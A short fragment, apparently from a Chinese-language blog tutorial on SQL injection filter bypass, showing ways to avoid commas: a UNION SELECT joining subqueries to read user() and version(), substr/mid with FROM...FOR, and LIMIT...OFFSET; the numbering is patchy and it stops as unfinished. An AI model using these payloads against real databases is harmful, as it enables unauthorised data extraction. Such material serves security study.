绕过逗号

  2. 使用join关键字
    select id,ip from client_ip where 1>2 union select from ((select user())a JOIN (select version())b);
    join基本使用例子:

SQL注入绕过_javascript

  2. 使用 from 1 for 1
    select substr(database() from 1 for 1);
    select mid(database() from 1 for 1);
  3. 使用offset关键字
    select * from news limit 0,1
    等价于下面这条SQL语句
    select * from yang limit 1 offset 0

(未完,待续)